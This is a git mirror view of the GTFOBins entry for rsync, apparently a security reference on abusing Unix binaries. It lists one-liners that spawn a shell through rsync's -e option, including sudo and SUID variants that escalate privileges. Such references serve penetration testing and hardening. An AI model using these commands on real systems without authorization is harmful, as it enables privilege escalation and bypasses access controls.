1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-13 02:58:09 +01:00

10 lines
246 B
Markdown
Raw Normal View History

2018-08-17 17:16:09 +02:00
---
functions:
2018-10-05 18:55:38 +01:00
shell:
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
2018-10-05 18:55:38 +01:00
sudo:
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
2018-10-05 18:55:38 +01:00
suid:
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
2018-08-17 17:16:09 +02:00
---